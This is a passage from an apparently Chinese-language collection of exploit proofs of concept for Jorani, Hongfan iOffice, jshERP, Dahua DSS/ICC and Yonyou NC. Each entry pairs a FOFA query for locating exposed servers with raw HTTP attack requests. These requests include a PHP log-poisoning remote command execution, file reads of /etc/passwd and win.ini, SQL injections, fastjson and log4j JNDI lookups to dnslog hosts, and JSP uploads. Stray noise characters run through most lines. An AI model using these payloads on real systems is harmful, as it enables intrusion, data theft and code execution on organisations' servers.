Host: 127.0.0.1 L8 I) i+ c3 o8 b
Pragma: no-cache( i# ?0 ]) M. I) h2 `: B+ @ S
Cache-Control: no-cache
9 l7 K& A* E! X/ ~5 Y0 }' zUpgrade-Insecure-Requests: 10 }3 t7 X4 X+ e0 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ V4 u3 j# {: W# p. A+ v% |" }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* G8 T3 X* J1 W; j* r+ r5 YAccept-Encoding: gzip, deflate4 r4 O: v( N: X6 p2 M1 _) \, C
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 x7 M& z9 _' hConnection: close( D7 y, `( {/ u5 k; @
7 j+ M0 d' c4 I2 w! T, o
5 j8 s# i3 ]/ ]7 q: m- u12. Jorani < 1.0.2 远程命令执行2 N1 s' D; z; g) A( ]- D1 C: j- K
FOFA:title="Jorani"
( r! W* [+ e K第一步先拿到cookie
8 [2 g+ M! ^9 s* @# m9 q7 rGET /session/login HTTP/1.17 }2 j! \# _/ }
Host: 192.168.190.30( D1 W$ l- O8 \* V: s% G5 R
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.363 y$ @6 I) w$ l& p
Connection: close, |, G1 q& a& ]
Accept-Encoding: gzip7 e' G( e: t' ~2 b+ t
+ k4 [; G0 q O* e
o I% ^" N( s" w0 I) }' ~响应中csrf_cookie_jorani用于后续请求
, T- y K) }) c9 lHTTP/1.1 200 OK3 l- c- I; U' t5 Y
Connection: close
* ?) Q I# c, P4 b" l$ U, PCache-Control: no-store, no-cache, must-revalidate1 F9 _; K8 H p' k& B- @! ~* l
Content-Type: text/html; charset=UTF-8( [6 u0 ]: `6 L1 U4 j. o
Date: Tue, 24 Oct 2023 09:34:28 GMT
6 S# j6 [. r# C8 T5 \Expires: Thu, 19 Nov 1981 08:52:00 GMT1 ^3 G) [; F' j# h. u) b6 [: t( b
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT! w" S+ Z4 b& H2 P. I/ P% l/ I& U
Pragma: no-cache
6 N- C9 V/ f, MServer: Apache/2.4.54 (Debian)8 ]5 i) a! A3 T6 e
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/5 r) y. p u p6 l
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly# q! a; A5 T7 u" C, }1 d' K
Vary: Accept-Encoding0 q6 N& `9 a w, Y9 g, @9 K
8 l+ \& M* y7 t) s* u6 F% U z
! I* I" I( l1 J, `9 M dPOST请求,执行函数并进行base64编码
/ p$ N. Q3 j# GPOST /session/login HTTP/1.1
; s2 b' P# z& C) X3 QHost: 192.168.190.30- l# m% J$ a7 o, T9 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
# J# Q$ I1 ?! n. uConnection: close
* X! y+ M: v. i) b% LContent-Length: 252
$ V5 n, p1 _& ~4 lContent-Type: application/x-www-form-urlencoded7 Z! \# K/ e2 y, F. T
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r* C; W& V7 x) {. s ?& w! M) \
Accept-Encoding: gzip
% }9 e) u5 m" ?/ K
& `! E+ j3 n0 _4 K' N$ H4 ucsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
+ ^ m( J j0 z3 M4 N. n: f7 F% r+ i( m( k! h! K* o7 B: {+ U
0 d h9 c+ k* i$ o! J" H% j. T
4 q* Y/ \7 B% s k# w( |$ K1 H
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串' c9 Q, Q0 A' Q$ Z6 }$ [; F
GET /pages/view/log-2023-10-24 HTTP/1.1/ h; i& f7 n) r: h
Host: 192.168.190.303 ~9 O" i% c r M# Z% C+ `. i4 u9 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
% i% Y5 n$ e0 n- {Connection: close
! @0 d- @# {4 a- R4 c, @) lCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
r) {1 Q5 y5 V v/ K' r6 h; ?& N: \K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
) x3 E' m3 j/ J4 nX-REQUESTED-WITH: XMLHttpRequest/ Y2 N* g. P& g% M$ Z5 q" s9 V
Accept-Encoding: gzip
1 D2 u g% X. [, q M, }
g) B. Y r7 N% O% Y& ]. I5 k4 }) W
13. 红帆iOffice ioFileDown任意文件读取, H6 Z7 w0 m( J+ t: z
FOFA:app="红帆-ioffice"
0 ]# s+ T: c3 `6 F7 RGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
" {: h4 y3 |% L# v- b2 t4 gHost: x.x.x.x
5 i; o4 S6 U; s6 oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
& e# W* f$ B2 E& `& e* i0 UConnection: close1 w# S- W5 ^* c* a
Accept: */*
! O! J; ~! ~- t1 T+ {Accept-Encoding: gzip1 x- `3 T( a$ F: M* b4 |9 ?
; T1 ]5 B- W8 C4 V0 c1 B: v) }+ z
14. 华夏ERP(jshERP)敏感信息泄露4 N4 U5 X* R% y/ y7 r
FOFA:body="jshERP-boot"
8 [0 t5 c- z# x. k g泄露内容包括用户名密码. V: f) I, p: ]# d9 T" X
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1& Z& h- ~6 h( M
Host: x.x.x.x n% i$ d: H' w* s8 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
S+ u5 d6 J* X6 c) d( Y4 y1 wConnection: close& x: P5 A& ? Z
Accept: */*
8 x; \7 D# u1 P$ g3 a& N8 tAccept-Language: en, g3 { j. g1 O6 H, c& m, o
Accept-Encoding: gzip0 p# ]4 d' j9 K( B" f1 J8 ?
0 s, G$ b! i/ b( i" m
7 {% |+ i' A" Z) ]1 X' p! ?0 y15. 华夏ERP getAllList信息泄露9 }4 x v2 w5 e0 ^0 N
CVE-2024-0490+ c/ n* a. y5 s* p
FOFA:body="jshERP-boot"7 ?. ]# O) {* }3 J7 R" a8 E
泄露内容包括用户名密码# G6 ^% q4 d+ V) K7 C$ d2 ]
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
6 ]7 p, Q4 x2 W* ^Host: 192.168.40.130:100
1 ?6 s4 C8 L( UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36/ @* b/ j+ j6 Q/ |9 N& V
Connection: close9 M- @5 H! ]( H$ g3 K
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
9 ?) G8 x% V+ t% UAccept-Language: en
: _4 N) X0 f/ y: M6 l5 osec-ch-ua-platform: Windows+ y I/ m3 N8 i7 T' [# k6 k @
Accept-Encoding: gzip- |- p2 o1 L4 e9 I
) S* P, w) k4 ^* R3 ?2 M2 B, b, E1 v! q) j5 g! p$ \
16. 红帆HFOffice医微云SQL注入6 d1 G; d: V. T# @4 W
FOFA:title="HFOffice"4 g% s n; E" J1 [5 H/ r
poc中调用函数计算1234的md5值
W, L7 j% R- g$ n+ fGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
5 r' H" k/ U" z2 g1 Z/ F# z" u# IHost: x.x.x.x
+ ^) c+ p7 {0 K3 p' L, h D8 a. ` RUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.361 w7 d2 _1 l. V8 A5 Z/ Q
Connection: close
/ n8 A3 ]" D7 ?7 j9 p4 u( e. XAccept: */*1 m1 \2 K1 ~* i% @& G" a
Accept-Language: en4 S0 O$ c/ K- t N
Accept-Encoding: gzip
; d5 S+ b- ?. T, H5 T9 x% Z: B, i+ P6 ~% `
6 R, o% g; E6 l9 ~! x V17. 大华 DSS itcBulletin SQL 注入, d, u$ H. U$ A6 B. Q
FOFA:app="dahua-DSS"
6 a' U! ^1 ~" mPOST /portal/services/itcBulletin?wsdl HTTP/1.1
! h9 ]9 a3 q8 Z+ q" XHost: x.x.x.x
) J6 w6 ~. `7 QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, {4 V2 `6 e" x0 {& K8 o% e
Connection: close7 z6 H7 j( G2 s& Z: s' C ?/ [4 j
Content-Length: 3457 n1 A9 @6 m4 Q/ {! t( u
Accept-Encoding: gzip; G3 b% k5 v0 r s; p
1 j1 ]/ i& D! n+ E, e<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>4 c \' z6 d, B0 |) d; z
<s11:Body>, u1 u3 M$ r# C
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
7 _ O" e# M5 s: ? <netMarkings>
7 f) W4 @* z; r- e, O/ p% w (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
( f& N g! ?( [! j9 ~' i9 e# V </netMarkings>
$ f; L1 B( e$ b' j$ @% f </ns1:deleteBulletin>1 |8 P" ~; p/ K! v
</s11:Body>
7 i4 ]3 m( D. [" ^3 l</s11:Envelope>4 _% {" r. J" o
* o; z5 S$ i$ Z) A" o1 ^
2 g. ?& v9 |' k, h& ~5 a18. 大华 DSS 数字监控系统 user_edit.action 信息泄露8 Y+ V2 d4 Q% y# h9 ]: _ w
FOFA:app="dahua-DSS"5 O `! i3 S4 h }8 |! @, J% b
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
; ^6 _/ x" I0 E& b8 P, `4 ^Host: your-ip: _, E" t! z/ t( Q. u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 L6 a2 }: ]2 V, q% _0 D7 WAccept-Encoding: gzip, deflate
( Z' ^4 I! V% [# }' VAccept: */*
; v# e# S7 J1 ]) y; v* i7 uConnection: keep-alive
9 d0 `1 _9 P" F+ j/ o
; O1 g$ R, f0 b+ J: ~% i; Y& f& y- Q- C. P9 F0 U3 |: K5 l6 v, H
1 }* @0 @* q1 E; {0 c) M4 s s
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入% D) L7 O. F# \+ ~' J3 R
FOFA:app="dahua-DSS"8 `9 ?, }9 T! H
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
9 n0 x4 ]3 g( W% z; BHost:
6 D- S7 F: C# m/ QUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 {5 |+ K& ~" S4 ~. n2 C# RAccept-Encoding: gzip, deflate
1 H( e$ x4 C8 EAccept: */*
. {: p$ Z( @5 q1 n- S N) qConnection: keep-alive
, d" Q9 G) l: A' j- d7 X: Q6 Y; {% z( ]: Y4 i
* b& _$ S, p, n8 i, E' l( s7 I20. 大华ICC智能物联综合管理平台任意文件读取
4 A6 _1 a$ ?- x# F) U0 HFOFA:body="*客户端会小于800*"& U$ x) k9 C, J8 d# [) ~* h
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.10 p% k" ?! y/ E' n r$ R( J8 T
Host: x.x.x.x; n5 ?" Q4 l8 q6 i" s
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& a5 a+ i6 v' ?- d$ k# HConnection: close. r$ B/ |1 S/ d* Q
Accept: */*9 a( Y+ }) [& [( n h# z$ X3 T
Accept-Language: en
% K. T: U* o: Z* O7 V& [Accept-Encoding: gzip/ D/ A7 y& W- A' ^. q
$ [ \3 N# L }1 B$ Z% f! ]' K
; Q# X2 e ^4 C# l8 g21. 大华ICC智能物联综合管理平台random远程代码执行0 Y5 o0 j+ N' y U& A' v
FOFA:icon_hash="-1935899595"
) [. F2 Z- l$ }1 Y, F4 d7 uPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
4 ]! ?/ z5 q1 \* Y/ J3 bHost: x.x.x.x
8 r# n& n5 |3 A w. I2 }2 v& aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) N9 }7 }( y: U* X1 `. Y
Content-Length: 161
z+ [2 j8 b) Q: D" W& }( U( xAccept-Encoding: gzip" s! b( \6 r" C B, E
Connection: close
4 U7 u; W+ z: B1 e9 W) QContent-Type: application/json;charset=utf-8
. @/ ]7 F) x& ~5 H4 V( |9 X: m6 w# @: C# E* ]& _
{
$ T! M. f+ h4 S6 U% V"a":{
5 {3 f7 T: Z' Q8 r "@type":"com.alibaba.fastjson.JSONObject",
5 y( R3 e" V" t% i. z {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}$ t# b0 Z6 ^2 n- N. f2 @& _# p
}""
2 X5 c7 f8 a' [/ V8 V) v}
9 N) M! z3 w h7 O
; |- i8 A& b7 C$ V/ O4 l, I3 R1 J$ _ u
22. 大华ICC智能物联综合管理平台 log4j远程代码执行9 a q, n9 \/ \4 g' y
FOFA:icon_hash="-1935899595"& ]3 ~- k' @8 { t& v' h* J! p! n/ q
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
, ]) L: z& d+ |Host: your-ip
# V# \' k c9 g M: C4 e lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 }4 h& K" `. w0 M1 P3 C: G
Content-Type: application/json;charset=utf-8
& @+ W2 F0 m9 K g& Y9 n, y( `
5 z0 ], z( g6 l# x. C( b0 _{
7 T5 Z; j% A3 {+ h! X# Y"loginName":"${jndi:ldap://dnslog}"5 Z2 s7 b& h, ?: u
}0 c5 ]) G: a& f% `
! A8 {, q- [# d% i& N* g( t5 s
1 S6 U* Y1 n* z8 o4 K0 U0 J: V+ B
' M# W/ \0 X: o9 T8 [. L
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行 U& s% R- Z0 n9 E7 B* c
FOFA:icon_hash="-1935899595"
) X" I3 f0 k& hPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
+ X) H' ^- t: I+ i7 t( v6 ]$ P- Z7 d- WHost: your-ip
- j( w e* t* ?8 Z4 W6 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ j5 L( z2 B- P; j |+ r
Content-Type: application/json;charset=utf-8
! l3 ~7 C( L2 @# [; f% SAccept-Encoding: gzip
' O6 A9 u& s. A. x1 NConnection: close5 p0 R' s; h b" I. B! O
. Q( t# e& S9 ?/ s5 W
{/ P/ O( [. _# b! y" {& P8 }, w
"a":{8 h5 T; q2 Z/ V; @: T& w% g
"@type":"com.alibaba.fastjson.JSONObject",
' j7 r1 {! f6 \ {"@type":"java.net.URL","val":"http://DNSLOG"}; `! I3 F$ i0 w- }0 ~$ ?
}""% v2 V/ {2 T! y8 @6 Q( n" w6 z/ p
}
) q2 @. o- Q+ p% M; U0 g$ R+ x3 S, W2 R& S% o1 g3 a
5 q2 r) J9 C4 y24. 用友NC 6.5 accept.jsp任意文件上传
$ D! r o. [& jFOFA:icon_hash="1085941792"$ D6 g) m2 s1 u) i4 ]: W
POST /aim/equipmap/accept.jsp HTTP/1.1& x2 r3 n" Z% n
Host: x.x.x.x
4 o' D% f( H' M5 M! L8 d! ^) Q8 `User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
2 n+ J$ R2 y3 u" ~$ D9 u P1 KConnection: close- j. w( [& q9 H' g9 h, \3 l1 U* _8 J7 w
Content-Length: 449
# S, H' w, o0 p0 o7 [) {5 WAccept: */*4 c3 H' t6 j; f5 I5 D9 {, t
Accept-Encoding: gzip$ F# q% t4 }: O5 }
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% v! e& u* Y8 Z' I6 S: \" o" \- I T; x b
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
8 U/ N5 i6 L4 {3 NContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
: M3 r, I1 H5 a4 W6 U& n- e9 VContent-Type: text/plain
7 Y% ?6 h! M1 o1 Y5 S/ {, R4 s8 J: [0 a7 n8 m5 D3 W6 ~. G
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>$ G+ E, [7 X# o y
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
7 ?; O( V; r4 l9 e' X G0 T- V7 rContent-Disposition: form-data; name="fname"
& y/ ^0 M3 T! s0 A' w5 |5 r. u9 @4 w, k' R# Q4 Y- v1 i$ \+ ~, F
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp, c$ w: d6 q( n6 C K2 x
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
1 e) Z+ l* w) O. P& R1 B' |& W( K" ?. W: V; u1 Q1 M: P
# b5 H7 x6 ~, B2 W& ?# {25. 用友NC registerServlet JNDI 远程代码执行
9 [& U8 n% Z# k- ?FOFA:app="用友-UFIDA-NC"
; ^! F+ G2 W2 R" ^4 j# l: l, ePOST /portal/registerServlet HTTP/1.1! ?+ T& G! m6 g$ R
Host: your-ip- y+ B! j4 R9 |( S @7 O4 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
9 x8 x. v/ \7 R8 u- {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
/ E! Z; ^! ^6 U1 MAccept-Encoding: gzip, deflate' Y* e) q- O1 A* }/ A
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
- k2 ^: K* u# q" \4 |Content-Type: application/x-www-form-urlencoded" C+ n, P$ X, U) @8 K6 G1 L/ |
) Z7 r0 U' w; q; s4 {1 ztype=1&dsname=ldap://dnslog# c' r q4 R) z: a) A
7 ^: e( u1 x/ T8 q h# p9 Q" _9 `5 N+ y. A
/ A( _- ?& J$ K26. 用友NC linkVoucher SQL注入1 Q: u# @# o( M7 Z0 L" [
FOFA:app="用友-UFIDA-NC"
! o b. f: E, M+ ]( Y- `$ JGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.12 l( ]' e0 E8 ~( y1 O
Host: your-ip
1 a. `, @2 K, J. y& @3 e# fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 p+ M8 V8 f7 y- U& @6 P1 T
Content-Type: application/x-www-form-urlencoded6 h$ t1 a7 D# y
Accept-Encoding: gzip, deflate9 l0 M1 R. G" w5 }/ I
Accept: */*
4 b; p2 M2 J, G- L9 U8 GConnection: keep-alive+ C# p% T7 w7 Y h) k* e
) L# A( h, z6 B5 l, E% A" ?9 H$ Q# U5 \' W& y, P p. h7 v H% u/ z0 |
27. 用友 NC showcontent SQL注入; v/ V. q- z, d: c3 \
FOFA:icon_hash="1085941792"
* z9 h% }7 p5 CGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
$ E% A8 n* S I+ r* EHost: your-ip+ m1 X1 q# |7 H2 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ V' V4 @! P# M2 G* l& M0 W/ V
Accept-Encoding: identity+ |. K6 j* b1 Z: w! Z) \# m
Connection: close N4 C I1 t: P
Content-Type: text/xml; charset=utf-8
0 b5 x7 ~6 f8 l$ T+ N9 g/ s1 j' ~4 V- `) |/ r7 x
: ^% |4 G! @) `/ g3 U/ L/ f" {- ?28. 用友NC grouptemplet 任意文件上传
4 _: D$ S& ?: Q( d4 C# d3 r9 eFOFA:icon_hash="1085941792"
2 k! B8 ^3 w2 f) v- _, u# aPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
/ d# k4 e/ ^5 ~2 x% aHost: x.x.x.x/ a7 W5 ~! i7 B5 D5 z0 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
, u2 o1 w4 t9 d5 xConnection: close0 |% L ]! l/ m
Content-Length: 268: V: w- N8 }, Z
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk9 c6 F5 H$ J/ r3 b2 m" J. |
Accept-Encoding: gzip# @1 U8 B, s4 x- s/ r
# ` r0 a9 B, S& r- O) D, K& o
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
# x: L6 Z( T9 ^Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp": z5 v2 {$ |; g# s( b( E3 z
Content-Type: application/octet-stream1 K5 W+ w# t$ r
+ N% u- H1 F% y, @: S& B<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
2 |! Y$ a& X3 V2 j6 a1 i3 [5 y------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
) {4 L% R' E; K! O0 [# k2 u3 U; x% W. d+ ]9 O7 g% P" g/ n
! P2 k1 o( F( P4 J
/uapim/static/pages/nc/head.jsp
2 V# m$ q u& A, Q1 \4 N
5 M, x* G% k- M; C7 Y; E29. 用友NC down/bill SQL注入
' M& Y7 r5 I. Y1 x! L- aFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
w" A- T1 q* g3 F) L( SGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
0 {$ j; {( p: i! `9 v" M& |1 _Host: your-ip
$ |6 X, X- v$ ]! s( ^( r. [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# O+ l2 k2 P: _, k6 cContent-Type: application/x-www-form-urlencoded' D/ D2 S! A, s0 _8 x/ x
Accept-Encoding: gzip, deflate- R7 w2 w' v' M- Q$ ^; U6 h% G
Accept: */*
3 ?/ _9 e& z, O' w- a y- l8 JConnection: keep-alive
1 r6 Q( f0 Y3 ^* j5 ^% y' [, b5 }; \& d' [# ^
/ g+ A- j! ^8 \% n3 b% w* T
30. 用友NC importPml SQL注入- |7 L- P% t* S, a! I
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif": d) y$ `4 X& b1 E
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
4 I6 ~* U8 R. ?. P- ^0 z0 `0 |Host: your-ip; J0 s# ^; w$ @! Z2 l' j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
# b3 x6 F& a9 |' UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.367 B" Z3 _9 _ A( X- x! f) H& R) W( P
Connection: close4 {+ k4 V% D8 H' N7 r6 i0 A" v
% c/ e2 J2 b* k2 R, |& ~
------WebKitFormBoundaryH970hbttBhoCyj9V
+ }6 e) t! ^& n JContent-Disposition: form-data; name="Filedata"; filename="1.jpg": \% |. u+ d, X6 U3 \7 R2 W+ m
Content-Type: image/jpeg
7 t% z% u& \! I3 p2 P------WebKitFormBoundaryH970hbttBhoCyj9V--
; ^8 n6 x8 @/ i! v! y8 J: N' A
' g7 c1 _' I$ W, s% K* n0 r' ~$ M9 l) I7 i, Z+ K) c
31. 用友NC runStateServlet SQL注入6 s; X; x- c/ H0 k
version<=6.5
8 O6 m7 w$ _! L& i* `FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
6 Z: x& U7 e' b' p9 u- XGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1# P4 O1 d% m) u$ ~
Host: host
4 b- p4 ]5 C2 R/ k$ FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" K7 y& c# Z+ e# t2 K/ F: x4 L- U9 ^
Content-Type: application/x-www-form-urlencoded& }% }. x5 @6 H; O# Y
3 l" @" d; @' ^( D
7 A H! Z; P4 j; z
32. 用友NC complainbilldetail SQL注入$ k* S- z& @7 D2 \6 N N
version= NC633、NC65; i0 p! _) \4 _
FOFA:app="用友-UFIDA-NC"0 u$ z0 |3 f& N" F; ]; U2 G) M
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1) |! W7 k6 T) r% R r0 B
Host: your-ip
5 T# `, z( g" @& e$ M) MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 _2 o' N1 Q0 Y w5 q
Content-Type: application/x-www-form-urlencoded" Y" d) d7 ?8 Q0 {, `
Accept-Encoding: gzip, deflate
6 [1 X; v$ T# t" m4 aAccept: */*5 h3 u! n' R5 g- |" p
Connection: keep-alive
1 b& x6 m" D& l/ b/ B* n% f. P
7 n/ k- a* E- M, a8 h' B' U; Y
P3 d/ _) i) V* t+ g) _0 l, d3 k33. 用友NC downTax/download SQL注入
! [- c; o& o; s) g& k1 k3 \version:NC6.5FOFA:app="用友-UFIDA-NC"
" I( U4 w6 A8 |( Y% K( Q: iGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1) j2 `& n# p6 L6 T/ f; h4 v$ H
Host: your-ip; X8 N' o5 g3 O7 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- ]! R& j0 {# D7 \& c% J
Content-Type: application/x-www-form-urlencoded
+ Q. {0 |5 U/ u7 M y, NAccept-Encoding: gzip, deflate
1 @: j# E" ]7 t/ W; J: s& sAccept: */*
- S2 i, t* \; _Connection: keep-alive! Y$ ]/ C* r, k) G5 L& \. _
* U# H! F+ `$ M! @8 G1 y
$ l/ B4 N) I. S0 Z34. 用友NC warningDetailInfo接口SQL注入! `# l8 l6 O f7 a) ]# `* D
FOFA:app="用友-UFIDA-NC"7 o3 k: c( d \) y) l- g5 R
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 T* s, z8 B# y/ [) WHost: your-ip/ R/ B Y: f$ i3 y( P7 e6 {+ ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- M, U( ]' v M8 \Content-Type: application/x-www-form-urlencoded* } }5 Z3 `1 J+ T
Accept-Encoding: gzip, deflate2 v* a) w Q9 [- D- [- c3 [. x
Accept: */** z% h/ S, y K4 o2 i
Connection: keep-alive
, O3 A+ U6 H) _- G) c! V* g6 j+ Q) H9 c; |" d# j
& G( B/ [; B* ]& \; w- \- W35. 用友NC-Cloud importhttpscer任意文件上传5 L! V" s: B. X& T1 r
FOFA:app="用友-NC-Cloud"
